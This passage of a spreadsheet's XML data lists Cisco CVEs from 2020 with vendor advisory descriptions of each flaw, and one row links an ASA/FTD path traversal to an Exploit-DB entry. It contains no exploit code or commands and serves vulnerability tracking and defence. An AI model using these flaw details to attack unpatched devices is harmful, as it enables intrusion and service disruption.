    <t>CVE-2020-3394</t>
  </si>
  <si>
    <t>A vulnerability in the Enable Secret feature of Cisco Nexus 3000 Series Switches and Cisco Nexus 9000 Series Switches in standalone NX-OS mode could allow an authenticated, local attacker to issue the enable command and get full administrative privileges. To exploit this vulnerability, the attacker would need to have valid credentials for the affected device. The vulnerability is due to a logic error in the implementation of the enable command. An attacker could exploit this vulnerability by logging in to the device and issuing the enable command. A successful exploit could allow the attacker to gain full administrative privileges without using the enable password. Note: The Enable Secret feature is disabled by default.</t>
  </si>
  <si>
    <t>CVE-2020-3396</t>
  </si>
  <si>
    <t>A vulnerability in the file system on the pluggable USB 3.0 Solid State Drive (SSD) for Cisco IOS XE Software could allow an authenticated, physical attacker to remove the USB 3.0 SSD and modify sensitive areas of the file system, including the namespace container protections. The vulnerability occurs because the USB 3.0 SSD control data is not stored on the internal boot flash. An attacker could exploit this vulnerability by removing the USB 3.0 SSD, modifying or deleting files on the USB 3.0 SSD by using another device, and then reinserting the USB 3.0 SSD on the original device. A successful exploit could allow the attacker to remove container protections and perform file actions outside the namespace of the container with root privileges.</t>
  </si>
  <si>
    <t>CVE-2020-3397</t>
  </si>
  <si>
    <t>A vulnerability in the Border Gateway Protocol (BGP) Multicast VPN (MVPN) implementation of Cisco NX-OS Software could allow an unauthenticated, remote attacker to cause an affected device to unexpectedly reload, resulting in a denial of service (DoS) condition. The vulnerability is due to incomplete input validation of a specific type of BGP MVPN update message. An attacker could exploit this vulnerability by sending this specific, valid BGP MVPN update message to a targeted device. A successful exploit could allow the attacker to cause one of the BGP-related routing applications to restart multiple times, leading to a system-level restart. Note: The Cisco implementation of BGP accepts incoming BGP traffic from only explicitly configured peers. To exploit this vulnerability, an attacker must send a specific BGP MVPN update message over an established TCP connection that appears to come from a trusted BGP peer. To do so, the attacker must obtain information about the BGP peers in the trusted network of the affected system.</t>
  </si>
  <si>
    <t>CVE-2020-3398</t>
  </si>
  <si>
    <t>A vulnerability in the Border Gateway Protocol (BGP) Multicast VPN (MVPN) implementation of Cisco NX-OS Software could allow an unauthenticated, remote attacker to cause a BGP session to repeatedly reset, causing a partial denial of service (DoS) condition due to the BGP session being down. The vulnerability is due to incorrect parsing of a specific type of BGP MVPN update message. An attacker could exploit this vulnerability by sending this BGP MVPN update message to a targeted device. A successful exploit could allow the attacker to cause the BGP peer connections to reset, which could lead to BGP route instability and impact traffic. The incoming BGP MVPN update message is valid but is parsed incorrectly by the NX-OS device, which could send a corrupted BGP update to the configured BGP peer. Note: The Cisco implementation of BGP accepts incoming BGP traffic from only explicitly configured peers. To exploit this vulnerability, an attacker must send a specific BGP MVPN update message over an established TCP connection that appears to come from a trusted BGP peer. To do so, the attacker must obtain information about the BGP peers in the trusted network of the affected system.</t>
  </si>
  <si>
    <t>CVE-2020-3399</t>
  </si>
  <si>
    <t>A vulnerability in the Control and Provisioning of Wireless Access Points (CAPWAP) protocol processing of Cisco IOS XE Software for Cisco Catalyst 9800 Series Wireless Controllers could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition of an affected device. The vulnerability is due to insufficient input validation during CAPWAP packet processing. An attacker could exploit this vulnerability by sending a crafted CAPWAP packet to an affected device, resulting in a buffer over-read. A successful exploit could allow the attacker to cause the affected device to crash and reload, resulting in a DoS condition on the affected device.</t>
  </si>
  <si>
    <t>CVE-2020-3400</t>
  </si>
  <si>
    <t>A vulnerability in the web UI feature of Cisco IOS XE Software could allow an authenticated, remote attacker to utilize parts of the web UI for which they are not authorized.The vulnerability is due to insufficient authorization of web UI access requests. An attacker could exploit this vulnerability by sending a crafted HTTP request to the web UI. A successful exploit could allow the attacker to utilize parts of the web UI for which they are not authorized. This could allow a Read-Only user to perform actions of an Admin user.</t>
  </si>
  <si>
    <t>CVE-2020-3401</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco SD-WAN vManage Software could allow an authenticated, remote attacker to conduct path traversal attacks and obtain read access to sensitive files on an affected system. The vulnerability is due to insufficient validation of HTTP requests. An attacker could exploit this vulnerability by sending a crafted HTTP request that contains directory traversal character sequences to the affected system. A successful exploit could allow the attacker to view arbitrary files on the affected system.</t>
  </si>
  <si>
    <t>CVE-2020-3402</t>
  </si>
  <si>
    <t>A vulnerability in the Java Remote Method Invocation (RMI) interface of Cisco Unified Customer Voice Portal (CVP) could allow an unauthenticated, remote attacker to access sensitive information on an affected device. The vulnerability exists because certain RMI listeners are not properly authenticated. An attacker could exploit this vulnerability by sending a crafted request to the affected listener. A successful exploit could allow the attacker to access sensitive information on an affected device.</t>
  </si>
  <si>
    <t>CVE-2020-3403</t>
  </si>
  <si>
    <t>A vulnerability in the CLI of Cisco IOS XE Software could allow an authenticated, local attacker to inject a command to the underlying operating system that will execute with root privileges upon the next reboot of the device. The authenticated user must have privileged EXEC permissions on the device. The vulnerability is due to insufficient protection of values passed to a script that executes during device startup. An attacker could exploit this vulnerability by writing values to a specific file. A successful exploit could allow the attacker to execute commands with root privileges each time the affected device is restarted.</t>
  </si>
  <si>
    <t>CVE-2020-3404</t>
  </si>
  <si>
    <t>A vulnerability in the persistent Telnet/Secure Shell (SSH) CLI of Cisco IOS XE Software could allow an authenticated, local attacker to gain shell access on an affected device and execute commands on the underlying operating system (OS) with root privileges. The vulnerability is due to insufficient enforcement of the consent token in authorizing shell access. An attacker could exploit this vulnerability by authenticating to the persistent Telnet/SSH CLI on an affected device and requesting shell access. A successful exploit could allow the attacker to gain shell access on the affected device and execute commands on the underlying OS with root privileges.</t>
  </si>
  <si>
    <t>CVE-2020-3405</t>
  </si>
  <si>
    <t>A vulnerability in the web UI of Cisco SD-WAN vManage Software could allow an authenticated, remote attacker to gain read and write access to information that is stored on an affected system. The vulnerability is due to improper handling of XML External Entity (XXE) entries when parsing certain XML files. An attacker could exploit this vulnerability by persuading a user to import a crafted XML file with malicious entries. A successful exploit could allow the attacker to read and write files within the affected application.</t>
  </si>
  <si>
    <t>CVE-2020-3406</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of the Cisco SD-WAN vManage Software could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface. The vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by persuading a user to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive, browser-based information.</t>
  </si>
  <si>
    <t>CVE-2020-3407</t>
  </si>
  <si>
    <t>A vulnerability in the RESTCONF and NETCONF-YANG access control list (ACL) function of Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause the device to reload. The vulnerability is due to incorrect processing of the ACL that is tied to the RESTCONF or NETCONF-YANG feature. An attacker could exploit this vulnerability by accessing the device using RESTCONF or NETCONF-YANG. A successful exploit could allow an attacker to cause the device to reload, resulting in a denial of service (DoS) condition.</t>
  </si>
  <si>
    <t>CVE-2020-3408</t>
  </si>
  <si>
    <t>A vulnerability in the Split DNS feature of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause an affected device to reload, resulting in a denial of service (DoS) condition. The vulnerability occurs because the regular expression (regex) engine that is used with the Split DNS feature of affected releases may time out when it processes the DNS name list configuration. An attacker could exploit this vulnerability by trying to resolve an address or hostname that the affected device handles. A successful exploit could allow the attacker to cause the device to reload, resulting in a DoS condition.</t>
  </si>
  <si>
    <t>CVE-2020-3409</t>
  </si>
  <si>
    <t>A vulnerability in the PROFINET feature of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, adjacent attacker to cause an affected device to crash and reload, resulting in a denial of service (DoS) condition on the device. The vulnerability is due to insufficient processing logic for crafted PROFINET packets that are sent to an affected device. An attacker could exploit this vulnerability by sending crafted PROFINET packets to an affected device for processing. A successful exploit could allow the attacker to cause the device to crash and reload, resulting in a DoS condition on the device.</t>
  </si>
  <si>
    <t>CVE-2020-3410</t>
  </si>
  <si>
    <t>A vulnerability in the Common Access Card (CAC) authentication feature of Cisco Firepower Management Center (FMC) Software could allow an unauthenticated, remote attacker to bypass authentication and access the FMC system. The attacker must have a valid CAC to initiate the access attempt. The vulnerability is due to incorrect session invalidation during CAC authentication. An attacker could exploit this vulnerability by performing a CAC-based authentication attempt to an affected system. A successful exploit could allow the attacker to access an affected system with the privileges of a CAC-authenticated user who is currently logged in.</t>
  </si>
  <si>
    <t>CVE-2020-3411</t>
  </si>
  <si>
    <t>A vulnerability in Cisco DNA Center software could allow an unauthenticated remote attacker access to sensitive information on an affected system. The vulnerability is due to improper handling of authentication tokens by the affected software. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker access to sensitive device information, which includes configuration files.</t>
  </si>
  <si>
    <t>CVE-2020-3412</t>
  </si>
  <si>
    <t>A vulnerability in the scheduled meeting template feature of Cisco Webex Meetings could allow an authenticated, remote attacker to create a scheduled meeting template that would belong to another user in their organization. The vulnerability is due to insufficient authorization enforcement for the creation of scheduled meeting templates. An attacker could exploit this vulnerability by sending a crafted request to the Webex Meetings interface to create a scheduled meeting template. A successful exploit could allow the attacker to create a scheduled meeting template that would belong to a user other than themselves.</t>
  </si>
  <si>
    <t>CVE-2020-3413</t>
  </si>
  <si>
    <t>A vulnerability in the scheduled meeting template feature of Cisco Webex Meetings could allow an authenticated, remote attacker to delete a scheduled meeting template that belongs to another user in their organization. The vulnerability is due to insufficient authorization enforcement for requests to delete scheduled meeting templates. An attacker could exploit this vulnerability by sending a crafted request to the Webex Meetings interface to delete a scheduled meeting template. A successful exploit could allow the attacker to delete a scheduled meeting template that belongs to a user other than themselves.</t>
  </si>
  <si>
    <t>CVE-2020-3414</t>
  </si>
  <si>
    <t>A vulnerability in the packet processing of Cisco IOS XE Software for Cisco 4461 Integrated Services Routers could allow an unauthenticated, remote attacker to cause an affected device to reload, resulting in a denial of service (DoS) condition. The vulnerability is due to incorrect processing of IPv4 or IPv6 traffic to or through an affected device. An attacker could exploit this vulnerability by sending IP traffic to or through an affected device. A successful exploit could allow the attacker to cause the device to reload, resulting in a DoS condition.</t>
  </si>
  <si>
    <t>CVE-2020-3415</t>
  </si>
  <si>
    <t>A vulnerability in the Data Management Engine (DME) of Cisco NX-OS Software could allow an unauthenticated, adjacent attacker to execute arbitrary code with administrative privileges or cause a denial of service (DoS) condition on an affected device. The vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by sending a crafted Cisco Discovery Protocol packet to a Layer 2-adjacent affected device. A successful exploit could allow the attacker to execute arbitrary code with administrative privileges or cause the Cisco Discovery Protocol process to crash and restart multiple times, causing the affected device to reload and resulting in a DoS condition. Note: Cisco Discovery Protocol is a Layer 2 protocol. To exploit this vulnerability, an attacker must be in the same broadcast domain as the affected device (Layer 2 adjacent). Exploitation of this vulnerability also requires jumbo frames to be enabled on the interface that receives the crafted Cisco Discovery Protocol packets on the affected device.</t>
  </si>
  <si>
    <t>CVE-2020-3416</t>
  </si>
  <si>
    <t>Multiple vulnerabilities in the initialization routines that are executed during bootup of Cisco IOS XE Software for Cisco ASR 900 Series Aggregation Services Routers with a Route Switch Processor 3 (RSP3) installed could allow an authenticated, local attacker with high privileges to execute persistent code at bootup and break the chain of trust. These vulnerabilities are due to incorrect validations by boot scripts when specific ROM monitor (ROMMON) variables are set. An attacker could exploit these vulnerabilities by copying a specific file to the local file system of an affected device and defining specific ROMMON variables. A successful exploit could allow the attacker to run arbitrary code on the underlying operating system (OS) with root privileges. To exploit these vulnerabilities, an attacker would need to have access to the root shell on the device or have physical access to the device.</t>
  </si>
  <si>
    <t>CVE-2020-3417</t>
  </si>
  <si>
    <t>A vulnerability in Cisco IOS XE Software could allow an authenticated, local attacker to execute persistent code at boot time and break the chain of trust. This vulnerability is due to incorrect validations by boot scripts when specific ROM monitor (ROMMON) variables are set. An attacker could exploit this vulnerability by installing code to a specific directory in the underlying operating system (OS) and setting a specific ROMMON variable. A successful exploit could allow the attacker to execute persistent code on the underlying OS. To exploit this vulnerability, the attacker would need access to the root shell on the device or have physical access to the device.</t>
  </si>
  <si>
    <t>CVE-2020-3418</t>
  </si>
  <si>
    <t>A vulnerability in Cisco IOS XE Wireless Controller Software for Cisco Catalyst 9800 Series Routers could allow an unauthenticated, adjacent attacker to send ICMPv6 traffic prior to the client being placed into RUN state. The vulnerability is due to an incomplete access control list (ACL) being applied prior to RUN state. An attacker could exploit this vulnerability by connecting to the associated service set identifier (SSID) and sending ICMPv6 traffic. A successful exploit could allow the attacker to send ICMPv6 traffic prior to RUN state.</t>
  </si>
  <si>
    <t>CVE-2020-3419</t>
  </si>
  <si>
    <t>A vulnerability in Cisco Webex Meetings and Cisco Webex Meetings Server could allow an unauthenticated, remote attacker to join a Webex session without appearing on the participant list. This vulnerability is due to improper handling of authentication tokens by a vulnerable Webex site. An attacker could exploit this vulnerability by sending crafted requests to a vulnerable Cisco Webex Meetings or Cisco Webex Meetings Server site. A successful exploit requires the attacker to have access to join a Webex meeting, including applicable meeting join links and passwords. The attacker could then exploit this vulnerability to join meetings, without appearing in the participant list, while having full access to audio, video, chat, and screen sharing capabilities.</t>
  </si>
  <si>
    <t>CVE-2020-3421</t>
  </si>
  <si>
    <t>Multiple vulnerabilities in the Zone-Based Firewall feature of Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause the device to reload or stop forwarding traffic through the firewall. The vulnerabilities are due to incomplete handling of Layer 4 packets through the device. An attacker could exploit these vulnerabilities by sending a certain sequence of traffic patterns through the device. A successful exploit could allow the attacker to cause the device to reload or stop forwarding traffic through the firewall, resulting in a denial of service. For more information about these vulnerabilities, see the Details section of this advisory.</t>
  </si>
  <si>
    <t>CVE-2020-3422</t>
  </si>
  <si>
    <t>A vulnerability in the IP Service Level Agreement (SLA) responder feature of Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause the IP SLA responder to reuse an existing port, resulting in a denial of service (DoS) condition. The vulnerability exists because the IP SLA responder could consume a port that could be used by another feature. An attacker could exploit this vulnerability by sending specific IP SLA control packets to the IP SLA responder on an affected device. The control packets must include the port number that could be used by another configured feature. A successful exploit could allow the attacker to cause an in-use port to be consumed by the IP SLA responder, impacting the feature that was using the port and resulting in a DoS condition.</t>
  </si>
  <si>
    <t>CVE-2020-3423</t>
  </si>
  <si>
    <t>A vulnerability in the implementation of the Lua interpreter that is integrated in Cisco IOS XE Software could allow an authenticated, local attacker to execute arbitrary code with root privileges on the underlying Linux operating system (OS) of an affected device. The vulnerability is due to insufficient restrictions on Lua function calls within the context of user-supplied Lua scripts. An attacker with valid administrative credentials could exploit this vulnerability by submitting a malicious Lua script. When this file is processed, an exploitable buffer overflow condition could occur. A successful exploit could allow the attacker to execute arbitrary code with root privileges on the underlying Linux OS of the affected device.</t>
  </si>
  <si>
    <t>CVE-2020-3425</t>
  </si>
  <si>
    <t>CVE-2020-3426</t>
  </si>
  <si>
    <t>A vulnerability in the implementation of the Low Power, Wide Area (LPWA) subsystem of Cisco IOS Software for Cisco 800 Series Industrial Integrated Services Routers (Industrial ISRs) and Cisco 1000 Series Connected Grid Routers (CGR1000) could allow an unauthenticated, remote attacker to gain unauthorized read access to sensitive data or cause a denial of service (DoS) condition. The vulnerability is due to a lack of input and validation checking mechanisms for virtual-LPWA (VLPWA) protocol modem messages. An attacker could exploit this vulnerability by supplying crafted packets to an affected device. A successful exploit could allow the attacker to gain unauthorized read access to sensitive data or cause the VLPWA interface of the affected device to shut down, resulting in DoS condition.</t>
  </si>
  <si>
    <t>CVE-2020-3427</t>
  </si>
  <si>
    <t>The Windows Logon installer prior to 4.1.2 did not properly validate file installation paths. This allows an attacker with local user privileges to coerce the installer to write to arbitrary privileged directories. If successful, an attacker can manipulate files used by Windows Logon, cause Denial of Service (DoS) by deleting file(s), or replace system files to potentially achieve elevation of privileges. Note that this can only exploitable during new installations while the installer is running and is not exploitable once installation is finished. Versions 4.1.2 of Windows Logon addresses this issue.</t>
  </si>
  <si>
    <t>CVE-2020-3428</t>
  </si>
  <si>
    <t>A vulnerability in the WLAN Local Profiling feature of Cisco IOS XE Wireless Controller Software for the Cisco Catalyst 9000 Family could allow an unauthenticated, adjacent attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to incorrect parsing of HTTP packets while performing HTTP-based endpoint device classifications. An attacker could exploit this vulnerability by sending a crafted HTTP packet to an affected device. A successful exploit could cause an affected device to reboot, resulting in a DoS condition.</t>
  </si>
  <si>
    <t>CVE-2020-3429</t>
  </si>
  <si>
    <t>A vulnerability in the WPA2 and WPA3 security implementation of Cisco IOS XE Wireless Controller Software for the Cisco Catalyst 9000 Family could allow an unauthenticated, adjacent attacker to cause denial of service (DoS) condition on an affected device. The vulnerability is due to incorrect packet processing during the WPA2 and WPA3 authentication handshake when configured for dot1x or pre-shared key (PSK) authentication key management (AKM) with 802.11r BSS Fast Transition (FT) enabled. An attacker could exploit this vulnerability by sending a crafted authentication packet to an affected device. A successful exploit could cause an affected device to reload, resulting in a DoS condition.</t>
  </si>
  <si>
    <t>CVE-2020-3430</t>
  </si>
  <si>
    <t>A vulnerability in the application protocol handling features of Cisco Jabber for Windows could allow an unauthenticated, remote attacker to execute arbitrary commands. The vulnerability is due to improper handling of input to the application protocol handlers. An attacker could exploit this vulnerability by convincing a user to click a link within a message sent by email or other messaging platform. A successful exploit could allow the attacker to execute arbitrary commands on a targeted system with the privileges of the user account that is running the Cisco Jabber client software.</t>
  </si>
  <si>
    <t>CVE-2020-3433</t>
  </si>
  <si>
    <t>A vulnerability in the interprocess communication (IPC) channel of Cisco AnyConnect Secure Mobility Client for Windows could allow an authenticated, local attacker to perform a DLL hijacking attack. To exploit this vulnerability, the attacker would need to have valid credentials on the Windows system. The vulnerability is due to insufficient validation of resources that are loaded by the application at run time. An attacker could exploit this vulnerability by sending a crafted IPC message to the AnyConnect process. A successful exploit could allow the attacker to execute arbitrary code on the affected machine with SYSTEM privileges. To exploit this vulnerability, the attacker would need to have valid credentials on the Windows system.</t>
  </si>
  <si>
    <t>CVE-2020-3434</t>
  </si>
  <si>
    <t>A vulnerability in the interprocess communication (IPC) channel of Cisco AnyConnect Secure Mobility Client for Windows could allow an authenticated, local attacker to cause a denial of service (DoS) condition on an affected device. To exploit this vulnerability, the attacker would need to have valid credentials on the Windows system. The vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by sending a crafted IPC message to the AnyConnect process on an affected device. A successful exploit could allow the attacker to stop the AnyConnect process, causing a DoS condition on the device. To exploit this vulnerability, the attacker would need to have valid credentials on the Windows system.</t>
  </si>
  <si>
    <t>CVE-2020-3435</t>
  </si>
  <si>
    <t>A vulnerability in the interprocess communication (IPC) channel of Cisco AnyConnect Secure Mobility Client for Windows could allow an authenticated, local attacker to overwrite VPN profiles on an affected device. To exploit this vulnerability, the attacker would need to have valid credentials on the Windows system. The vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by sending a crafted IPC message to the AnyConnect process on an affected device. A successful exploit could allow the attacker to modify VPN profile files. To exploit this vulnerability, the attacker would need to have valid credentials on the Windows system.</t>
  </si>
  <si>
    <t>CVE-2020-3436</t>
  </si>
  <si>
    <t>A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to upload arbitrary-sized files to specific folders on an affected device, which could lead to an unexpected device reload. The vulnerability exists because the affected software does not efficiently handle the writing of large files to specific folders on the local file system. An attacker could exploit this vulnerability by uploading files to those specific folders. A successful exploit could allow the attacker to write a file that triggers a watchdog timeout, which would cause the device to unexpectedly reload, causing a denial of service (DoS) condition.</t>
  </si>
  <si>
    <t>CVE-2020-3437</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco SD-WAN vManage Software could allow an authenticated, remote attacker to read arbitrary files on the underlying filesystem of the device. The vulnerability is due to insufficient file scope limiting. An attacker could exploit this vulnerability by creating a specific file reference on the filesystem and then accessing it through the web-based management interface. A successful exploit could allow the attacker to read arbitrary files from the filesystem of the underlying operating system.</t>
  </si>
  <si>
    <t>CVE-2020-3439</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco Data Center Network Manager (DCNM) Software could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface. The vulnerability is due to insufficient input validation by the web-based management interface. An attacker could exploit this vulnerability by inserting malicious data into a specific data field in the interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.</t>
  </si>
  <si>
    <t>CVE-2020-3440</t>
  </si>
  <si>
    <t>A vulnerability in Cisco Webex Meetings Desktop App for Windows could allow an unauthenticated, remote attacker to overwrite arbitrary files on an end-user system. The vulnerability is due to improper validation of URL parameters that are sent from a website to the affected application. An attacker could exploit this vulnerability by persuading a user to follow a URL to a website that is designed to submit crafted input to the affected application. A successful exploit could allow the attacker to overwrite arbitrary files on the affected system, possibly corrupting or deleting critical system files.</t>
  </si>
  <si>
    <t>CVE-2020-3441</t>
  </si>
  <si>
    <t>A vulnerability in Cisco Webex Meetings and Cisco Webex Meetings Server could allow an unauthenticated, remote attacker to view sensitive information from the meeting room lobby. This vulnerability is due to insufficient protection of sensitive participant information. An attacker could exploit this vulnerability by browsing the Webex roster. A successful exploit could allow the attacker to gather information about other Webex participants, such as email address and IP address, while waiting in the lobby.</t>
  </si>
  <si>
    <t>CVE-2020-3442</t>
  </si>
  <si>
    <t>The DuoConnect client enables users to establish SSH connections to hosts protected by a DNG instance. When a user initiates an SSH connection to a DNG-protected host for the first time using DuoConnect, the userâ€™s browser is opened to a login screen in order to complete authentication determined by the contents of the '-relay' argument. If the â€˜-relayâ€™ is set to a URL beginning with "http://", then the browser will initially attempt to load the URL over an insecure HTTP connection, before being immediately redirected to HTTPS (in addition to standard redirect mechanisms, the DNG uses HTTP Strict Transport Security headers to enforce this). After successfully authenticating to a DNG, DuoConnect stores an authentication token in a local system cache, so users do not have to complete this browser-based authentication workflow for every subsequent SSH connection. These tokens are valid for a configurable period of time, which defaults to 8 hours. If a user running DuoConnect already has a valid token, then instead of opening a web browser, DuoConnect directly contacts the DNG, again using the configured '-relay' value, and sends this token, as well as the intended SSH server hostname and port numbers. If the '-relay' argument begins with "http://", then this request will be sent over an insecure connection, and could be exposed to an attacker who is sniffing the traffic on the same network. The DNG authentication tokens that may be exposed during SSH relay may be used to gain network-level access to the servers and ports protected by that given relay host. The DNG provides network-level access only to the protected SSH servers. It does not interact with the independent SSH authentication and encryption. An attacker cannot use a stolen token on its own to authenticate against a DNG-protected SSH server.</t>
  </si>
  <si>
    <t>CVE-2020-3443</t>
  </si>
  <si>
    <t>A vulnerability in Cisco Smart Software Manager On-Prem (SSM On-Prem) could allow an authenticated, remote attacker to elevate privileges and execute commands with higher privileges. The vulnerability is due to insufficient authorization of the System Operator role capabilities. An attacker could exploit this vulnerability by logging in with the System Operator role, performing a series of actions, and then assuming a new higher privileged role. A successful exploit could allow the attacker to perform all actions associated with the privilege of the assumed role. If that role is an administrative role, the attacker would gain full access to the device.</t>
  </si>
  <si>
    <t>CVE-2020-3444</t>
  </si>
  <si>
    <t>A vulnerability in the packet filtering features of Cisco SD-WAN Software could allow an unauthenticated, remote attacker to bypass L3 and L4 traffic filters. The vulnerability is due to improper traffic filtering conditions on an affected device. An attacker could exploit this vulnerability by crafting a malicious TCP packet with specific characteristics and sending it to a targeted device. A successful exploit could allow the attacker to bypass the L3 and L4 traffic filters and inject an arbitrary packet into the network.</t>
  </si>
  <si>
    <t>CVE-2020-3446</t>
  </si>
  <si>
    <t>A vulnerability in Cisco Virtual Wide Area Application Services (vWAAS) with Cisco Enterprise NFV Infrastructure Software (NFVIS)-bundled images for Cisco ENCS 5400-W Series and CSP 5000-W Series appliances could allow an unauthenticated, remote attacker to log into the NFVIS CLI of an affected device by using accounts that have a default, static password. The vulnerability exists because the affected software has user accounts with default, static passwords. An attacker with access to the NFVIS CLI of an affected device could exploit this vulnerability by logging into the CLI. A successful exploit could allow the attacker to access the NFVIS CLI with administrator privileges.</t>
  </si>
  <si>
    <t>CVE-2020-3447</t>
  </si>
  <si>
    <t>A vulnerability in the CLI of Cisco AsyncOS for Cisco Email Security Appliance (ESA) and Cisco AsyncOS for Cisco Content Security Management Appliance (SMA) could allow an authenticated, remote attacker to access sensitive information on an affected device. The vulnerability is due to excessive verbosity in certain log subscriptions. An attacker could exploit this vulnerability by accessing specific log files on an affected device. A successful exploit could allow the attacker to obtain sensitive log data, which may include user credentials. To exploit this vulnerability, the attacker would need to have valid credentials at the operator level or higher on the affected device.</t>
  </si>
  <si>
    <t>CVE-2020-3448</t>
  </si>
  <si>
    <t>A vulnerability in an access control mechanism of Cisco Cyber Vision Center Software could allow an unauthenticated, remote attacker to bypass authentication and access internal services that are running on an affected device. The vulnerability is due to insufficient enforcement of access control in the software. An attacker could exploit this vulnerability by directly accessing the internal services of an affected device. A successful exploit could allow an attacker to impact monitoring of sensors that are managed by the software.</t>
  </si>
  <si>
    <t>CVE-2020-3449</t>
  </si>
  <si>
    <t>A vulnerability in the Border Gateway Protocol (BGP) additional paths feature of Cisco IOS XR Software could allow an unauthenticated, remote attacker to prevent authorized users from monitoring the BGP status and cause the BGP process to stop processing new updates, resulting in a denial of service (DOS) condition. The vulnerability is due to an incorrect calculation of lexicographical order when displaying additional path information within Cisco IOS XR Software, which causes an infinite loop. An attacker could exploit this vulnerability by sending a specific BGP update from a BGP neighbor peer session of an affected device; an authorized user must then issue a show bgp command for the vulnerability to be exploited. A successful exploit could allow the attacker to prevent authorized users from properly monitoring the BGP status and prevent BGP from processing new updates, resulting in outdated information in the routing and forwarding tables.</t>
  </si>
  <si>
    <t>CVE-2020-3450</t>
  </si>
  <si>
    <t>A vulnerability in the web-based management interface of Cisco Vision Dynamic Signage Director could allow an authenticated, remote attacker with administrative credentials to conduct SQL injection attacks on an affected system. The vulnerability is due to improper validation of user-submitted parameters. An attacker could exploit this vulnerability by authenticating to the web-based management interface and sending malicious requests to an affected system. A successful exploit could allow the attacker to obtain data that is stored in the underlying database, including hashed user credentials. To exploit this vulnerability, an attacker would need valid administrative credentials.</t>
  </si>
  <si>
    <t>CVE-2020-3451</t>
  </si>
  <si>
    <t>Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV340 Series Routers could allow an authenticated, remote attacker with administrative credentials to execute arbitrary commands on the underlying operating system (OS) as a restricted user. For more information about these vulnerabilities, see the Details section of this advisory.</t>
  </si>
  <si>
    <t>CVE-2020-3452</t>
  </si>
  <si>
    <t>A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.</t>
  </si>
  <si>
    <t>exploits/hardware/webapps/48871.txt</t>
  </si>
  <si>
    <t>Cisco ASA and FTD 9.6.4.42 - Path Traversal</t>
  </si>
  <si>
    <t>2020-10-12</t>
  </si>
  <si>
    <t>CVE-2020-3453</t>
  </si>
  <si>
    <t>CVE-2020-3454</t>
  </si>
  <si>
    <t>A vulnerability in the Call Home feature of Cisco NX-OS Software could allow an authenticated, remote attacker to inject arbitrary commands that could be executed with root privileges on the underlying operating system (OS). The vulnerability is due to insufficient input validation of specific Call Home configuration parameters when the software is configured for transport method HTTP. An attacker could exploit this vulnerability by modifying parameters within the Call Home configuration on an affected device. A successful exploit could allow the attacker to execute arbitrary commands with root privileges on the underlying OS.</t>
  </si>
  <si>
    <t>CVE-2020-3455</t>
  </si>
  <si>
    <t>A vulnerability in the secure boot process of Cisco FXOS Software could allow an authenticated, local attacker to bypass the secure boot mechanisms. The vulnerability is due to insufficient protections of the secure boot process. An attacker could exploit this vulnerability by injecting code into a specific file that is then referenced during the device boot process. A successful exploit could allow the attacker to break the chain of trust and inject code into the boot process of the device which would be executed at each boot and maintain persistence across reboots.</t>
  </si>
  <si>
    <t>CVE-2020-3456</t>
  </si>
  <si>
    <t>A vulnerability in the Cisco Firepower Chassis Manager (FCM) of Cisco FXOS Software could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack against a user of an affected device. The vulnerability is due to insufficient CSRF protections for the FCM interface. An attacker could exploit this vulnerability by persuading a targeted user to click a malicious link. A successful exploit could allow the attacker to send arbitrary requests that could take unauthorized actions on behalf of the targeted user.</t>
  </si>
  <si>
    <t>CVE-2020-3457</t>
  </si>
  <si>
    <t>A vulnerability in the CLI of Cisco FXOS Software could allow an authenticated, local attacker to inject arbitrary commands that are executed with root privileges. The vulnerability is due to insufficient input validation of commands supplied by the user. An attacker could exploit this vulnerability by authenticating to a device and submitting crafted input to the affected command. A successful exploit could allow the attacker to execute commands on the underlying operating system with root privileges.</t>
  </si>
  <si>
    <t>CVE-2020-3458</t>
  </si>
  <si>
    <t>Multiple vulnerabilities in the secure boot process of Cisco Adaptive Security Appliance (ASA) Software and Firepower Threat Defense (FTD) Software for the Firepower 1000 Series and Firepower 2100 Series Appliances could allow an authenticated, local attacker to bypass the secure boot mechanism. The vulnerabilities are due to insufficient protections of the secure boot process. An attacker could exploit these vulnerabilities by injecting code into specific files that are then referenced during the device boot process. A successful exploit could allow the attacker to break the chain of trust and inject code into the boot process of the device, which would be executed at each boot and maintain persistence across reboots.</t>
  </si>
  <si>
    <t>CVE-2020-3459</t>
  </si>
  <si>
    <t>CVE-2020-3460</t>
  </si>
  <si>
